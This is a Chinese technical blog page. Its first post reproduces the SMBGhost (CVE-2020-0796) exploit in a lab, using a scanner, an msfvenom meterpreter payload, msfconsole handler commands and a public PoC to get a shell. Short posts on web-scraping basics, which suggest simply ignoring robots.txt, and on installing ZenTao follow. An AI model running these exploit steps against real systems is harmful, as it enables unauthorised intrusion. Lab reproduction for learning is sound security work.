跳到主要内容

Linux 修行之路 · Blog

Linux修行之路 - 技术博客

分享Kubernetes、Linux、Python、网络安全等技术文章

文章数量169
技术分类9
查看分类
23

CVE-2020-0796漏洞复现

· 阅读需 3 分钟

一、CVE-2020-0796简介

0x01 漏洞简介

CVE-2020-0796是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的;在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。它可让远程且未经身份验证的攻击者在目标系统上执行任意代码,该漏洞类似于永恒之蓝。

漏洞危害等级:高

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

二、实验环境

靶机:存在漏洞的win10虚拟机环境,系统镜像:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

ip地址:192.168.117.150

安装镜像后的注意事项:

  • 将windows10的防火墙关掉,使能互相ping通
  • 将window10的自动更新关掉,避免漏洞被打补丁

检测工具:

https://github.com/dickens88/cve-2020-0796-scanner

getshell代码:

https://github.com/chompie1337/SMBGhost_RCE_PoC

攻击机:kali

ip地址:192.168.117.132

三、复现过程

1、先用检测代码对目标主机进行扫描,发现存在漏洞

python3 cve-2020-0796-scanner.py -t 192.168.117.150

1

2.使用msfvenom命令生成shellcode代码

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

2

将生成的shellcode.txt中的代码替换getshell代码中exploit.py中的USER_PAYLOAD部分

3.开启kali中的msf使用handler模块开启监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.117.150
set lport 3333
run

3

4

4.运行修改好的漏洞利用代码:

python3 exploit.py -ip 192.168.117.150

5

5.发现在msf控制台成功获得反弹shell

7

8

6.发现有乱码,使用chcp 65001显示正常

9

至此复现完成

四、发生的错误

  • 修改后的源码有些错误需要改

10

爬虫的概念

· 阅读需 3 分钟

简要说一下关于爬虫的东西。

爬虫的概念

爬虫的别名很多,网络爬虫,网络蜘蛛之类的大家都知道就不说了。

通俗来讲,爬虫就是通过编写程序,模拟我们使用浏览器上网,在互联网中抓取我们想要的数据的过程。

这里有两个关键词:模拟和抓取

  • 模拟,也就是通过代码来进行操作,不需要人直接参与访问网页的过程。不过其实从广义上讲,我们使用浏览器也可以看作是一个爬虫的过程。浏览器就是一个纯天然最原始的一个爬虫工具。只不过我们的效率太低,这种工作太无聊,所以交给计算机去做了而已
  • 抓取,又涉及到两个方面的含义:抓取一整张的页面源码数据和抓取一整张页面中的局部数据。显而易见,要抓取到页面的局部数据,首先还是要抓取到一整张页面的完整源码数据。

爬虫的分类

依据抓取的内容和使用的方式不同,大致可以将爬虫分为四个类别:通用爬虫、聚焦爬虫、增量式爬虫和分布式爬虫。

  • 通用爬虫:爬取一整张页面的源码数据
  • 聚焦爬虫:爬取一张页面中的局部的数据,聚焦爬虫一定是建立在通用爬虫基础之上
  • 增量式爬虫:用来监测网站数据更新的情况,以便爬取到网站最新更新出来的数据
  • 分布式爬虫:提高爬取效率的终极武器。基于 scrapy 框架,使用的方法包括但不限于高并发

反爬机制与反反爬策略

  • 反爬机制
    • 是作用到门户网站中。如果网站不想让爬虫轻易爬取到数据,它可以制定相关的机制或者措施阻止爬虫程序爬取其数据。
  • 反反爬策略
    • 是作用在爬虫程序中。我们爬虫可以制定相关的策略破击反爬机制从而爬取到相关的数据。

robots 协议,课程第一个反爬机制

  • robots 协议:防君子不防小人

    • 是一个纯文本的协议,协议中规定了该网站中哪些数据可以被哪些爬虫爬取,哪些不可以被爬取。

    • 一般在网站的门户页面后面加上 /robots.txt 即可查看该网站的 robots 协议,比如京东的:

  • 破解:

    • 你自己主观性地不遵从该协议即可。

爬虫模块

我们要学到的爬虫模块又下面两个:requests 和 scrapy。

requests 模块

  • 数据解析
  • 动态加载数据的爬取
  • selenium
  • 移动端数据的爬取
  • 异步的爬虫
  • 10 种反爬机制

scrapy 框架

  • 异步的爬虫框架

禅道搭建

· 阅读需 1 分钟

禅道搭建

下载安装包

wget https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fdl.cnezsoft.com%2Fzentao%2F15.0.2%2FZenTaoPMS.15.0.2.zbox_64.tar.gz

安装

# 将安装包直接解压到/opt目录下
# PS:不要 解压到别的目录再拷贝到/opt/,因为这样会导致文件的所有者和读写权限改变, 也不要解压后把整个目录777权限
tar -zxvf ZenTaoPMS.7.3.stable.zbox_32.tar.gz -C /opt

# Apache和Mysql常用命令
执行/opt/zbox/zbox start 命令开启Apache和Mysql。
执行/opt/zbox/zbox stop 命令停止Apache和Mysql。
执行/opt/zbox/zbox restart 命令重启Apache和Mysql。
# 注:如果需要开机自动启动,可以把 /opt/zbox/zbox restart 加到操作系统的自启目录。

# 访问和登录禅道
http://禅道服务器ip:apache端口
禅道默认管理员帐号是 admin,密码 123456

网址

https://www.zentao.net/book/zentaopmshelp/90.html